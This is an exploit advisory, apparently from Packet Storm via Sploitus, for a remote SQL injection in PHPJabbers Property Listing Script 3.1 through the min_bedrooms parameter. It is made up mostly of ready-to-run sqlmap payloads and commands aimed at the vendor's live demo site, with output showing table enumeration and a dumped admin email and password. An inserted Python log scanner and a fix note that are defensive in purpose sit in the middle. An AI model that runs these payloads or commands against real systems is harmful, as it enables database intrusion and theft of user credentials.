## https://sploitus.com/exploit?id=PACKETSTORM:167757
CraCkEr - THE CRACK OF ETERNAL MIGHT  
From The Ashes and Dust Rises An Unimaginable crack....  
[ Exploits ]  
  
Author    : CraCkEr  
Website   : phpjabbers.com  
Vendor    : PHPJABBERS  
Software  : Property Listing Script 3.1  
Vuln Type : Remote SQL Injection  
Method    : GET  
Critical  : High  
Impact    : Database Access  
  
Property Listing Script will give you the tools to efficiently manage your own real estate portal.  
  
B4nks-NET irc.b4nks.tk #unix  
  
Release Notes:  
==============  
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.  
  
Greets:  
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk  
loool, DevS, Dark-Gost  
CryptoJob (Twitter) twitter.com/CryptozJob  
© CraCkEr 2022  
  
  
Live Demo Site:  
  
https://www.phpjabbers.com/property-listing-script/#sectionDemo  
  
  
[INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable  
GET parameter 'min_bedrooms' is vulnerable.  
  
sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:  
  
---  
Parameter: min_bedrooms (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861  
---  
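As an added defender-side example (not part of CraCkEr's advisory or of the vendor's code), the three payload shapes sqlmap reported above can be turned into an access-log check. The script parses constructed Apache combined-format log lines (the log format, client addresses and timestamps are assumptions), keeps only requests to the pjListings/pjActionProperties search endpoint, and flags any min_bedrooms value that is not a plain integer, labelling it with the technique its payload matches.

```python
# Added example, not code from the advisory or the vendor. Flags requests
# carrying the min_bedrooms injection patterns shown in the sqlmap output.
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format (assumed): client, ident, user, time, request, status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Signatures taken from the three payloads sqlmap reported for min_bedrooms.
# Order matters: the time-based payload also ends in a tautology, so SLEEP is tested first.
SIGNATURES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s*\(?\s*(\d+)\s*=\s*\1\b", re.I)),
]

def classify_request(line):
    """Return (client_ip, technique) for a suspicious property-search request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    # Only the endpoint named in the advisory is in scope here.
    if qs.get("controller") != ["pjListings"] or qs.get("action") != ["pjActionProperties"]:
        return None
    value = qs.get("min_bedrooms", [""])[0]  # parse_qs already percent-decodes
    # A legitimate bedroom count is a bare integer; anything else is suspect.
    if value.isdigit():
        return None
    for technique, pattern in SIGNATURES:
        if pattern.search(value):
            return m.group("ip"), technique
    return m.group("ip"), "non-numeric min_bedrooms"

def scan(lines):
    """Run classify_request over a log and return every hit, in order."""
    return [hit for hit in (classify_request(l) for l in lines) if hit]

# Constructed sample log lines (addresses and dates are made up); the two
# encoded payloads reproduce the boolean-based and time-based ones above.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jul/2022:01:13:36 +0000] "GET /preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [16/Jul/2022:01:13:37 +0000] "GET /preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1%29%20AND%207719%3D7719%20AND%20%282759%3D2759 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [16/Jul/2022:01:13:38 +0000] "GET /preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1%29%20AND%20%28SELECT%202245%20FROM%20%28SELECT%28SLEEP%285%29%29%29iJfC%29%20AND%20%281861%3D1861 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [16/Jul/2022:01:14:00 +0000] "GET /preview.php?controller=pjListings&action=pjActionListing&id=1 HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for ip, technique in scan(SAMPLE_LOG):
        print(f"{ip}: {technique}")
```

The same check is the server-side fix in miniature: a bedroom count that fails `isdigit()` should never reach the query, and the query itself should bind the value as an integer parameter rather than splicing it into the WHERE clause.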
  
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5  
  
[INFO] the back-end DBMS is MySQL  
web server operating system: Linux CentOS 6  
web application technology: Apache 2.2.15  
back-end DBMS: MySQL >= 5.6  
[01:13:36] [INFO] fetching current database  
[01:13:36] [INFO] retrieved: 'pjabbers_demo_pls'  
current database: 'pjabbers_demo_pls'  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent  
  
---  
Parameter: min_bedrooms (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861  
---  
  
[INFO] the back-end DBMS is MySQL  
web server operating system: Linux CentOS 6  
web application technology: Apache 2.2.15  
back-end DBMS: MySQL >= 5.6  
Database: pjabbers_demo_pls  
  
[66 tables]  
+----------------------------------------------------------------+  
| 1657528735_303_pls_30_property_listing_features |  
| 1657528735_303_pls_30_property_listing_fields |  
| 1657528735_303_pls_30_property_listing_multi_lang |  
| 1657528735_303_pls_30_property_listing_options |  
| 1657528735_303_pls_30_property_listing_passwords |  
| 1657528735_303_pls_30_property_listing_payments |  
| 1657528735_303_pls_30_property_listing_periods |  
| 1657528735_303_pls_30_property_listing_plugin_country |  
| 1657528735_303_pls_30_property_listing_plugin_galleries_set |  
| 1657528735_303_pls_30_property_listing_plugin_gallery |  
| 1657528735_303_pls_30_property_listing_plugin_locale_languages |  
| 1657528735_303_pls_30_property_listing_plugin_locale |  
| 1657528735_303_pls_30_property_listing_plugin_log_config |  
| 1657528735_303_pls_30_property_listing_plugin_log |  
| 1657528735_303_pls_30_property_listing_plugin_one_admin |  
| 1657528735_303_pls_30_property_listing_plugin_paypal |  
| 1657528735_303_pls_30_property_listing_plugin_sms |  
| 1657528735_303_pls_30_property_listing_properties_features |  
| 1657528735_303_pls_30_property_listing_properties |  
| 1657528735_303_pls_30_property_listing_roles |  
| 1657528735_303_pls_30_property_listing_types |  
| 1657528735_303_pls_30_property_listing_users |  
| 1657921261_148_pls_30_property_listing_features |  
| 1657921261_148_pls_30_property_listing_fields |  
| 1657921261_148_pls_30_property_listing_multi_lang |  
| 1657921261_148_pls_30_property_listing_options |  
| 1657921261_148_pls_30_property_listing_passwords |  
| 1657921261_148_pls_30_property_listing_payments |  
| 1657921261_148_pls_30_property_listing_periods |  
| 1657921261_148_pls_30_property_listing_plugin_country |  
| 1657921261_148_pls_30_property_listing_plugin_galleries_set |  
| 1657921261_148_pls_30_property_listing_plugin_gallery |  
| 1657921261_148_pls_30_property_listing_plugin_locale_languages |  
| 1657921261_148_pls_30_property_listing_plugin_locale |  
| 1657921261_148_pls_30_property_listing_plugin_log_config |  
| 1657921261_148_pls_30_property_listing_plugin_log |  
| 1657921261_148_pls_30_property_listing_plugin_one_admin |  
| 1657921261_148_pls_30_property_listing_plugin_paypal |  
| 1657921261_148_pls_30_property_listing_plugin_sms |  
| 1657921261_148_pls_30_property_listing_properties_features |  
| 1657921261_148_pls_30_property_listing_properties |  
| 1657921261_148_pls_30_property_listing_roles |  
| 1657921261_148_pls_30_property_listing_types |  
| 1657921261_148_pls_30_property_listing_users |  
| pls_30_property_listing_features |  
| pls_30_property_listing_fields |  
| pls_30_property_listing_multi_lang |  
| pls_30_property_listing_options |  
| pls_30_property_listing_passwords |  
| pls_30_property_listing_payments |  
| pls_30_property_listing_periods |  
| pls_30_property_listing_plugin_country |  
| pls_30_property_listing_plugin_galleries_set |  
| pls_30_property_listing_plugin_gallery |  
| pls_30_property_listing_plugin_locale |  
| pls_30_property_listing_plugin_locale_languages |  
| pls_30_property_listing_plugin_log |  
| pls_30_property_listing_plugin_log_config |  
| pls_30_property_listing_plugin_one_admin |  
| pls_30_property_listing_plugin_paypal |  
| pls_30_property_listing_plugin_sms |  
| pls_30_property_listing_properties |  
| pls_30_property_listing_properties_features |  
| pls_30_property_listing_roles |  
| pls_30_property_listing_types |  
| pls_30_property_listing_users |  
+----------------------------------------------------------------+  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent  
  
fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'  
  
Database: pjabbers_demo_pls  
Table: pls_30_property_listing_users  
  
[12 columns]  
+------------+------------------+  
| Column | Type |  
+------------+------------------+  
| created | datetime |  
| email | varchar(255) |  
| fax | varchar(255) |  
| id | int(10) unsigned |  
| ip | varchar(15) |  
| is_active | enum('T','F') |  
| last_login | datetime |  
| name | varchar(255) |  
| password | blob |  
| phone | varchar(255) |  
| role_id | int(10) unsigned |  
| status | enum('T','F') |  
+------------+------------------+  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent  
  
fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'  
  
Database: pjabbers_demo_pls  
Table: pls_30_property_listing_users  
  
[1 entry]  
+-----------------+----------+  
| email | password |  
+-----------------+----------+  
| admin@admin.com | P@S13rd |  
+-----------------+----------+  
  
  
[-] Done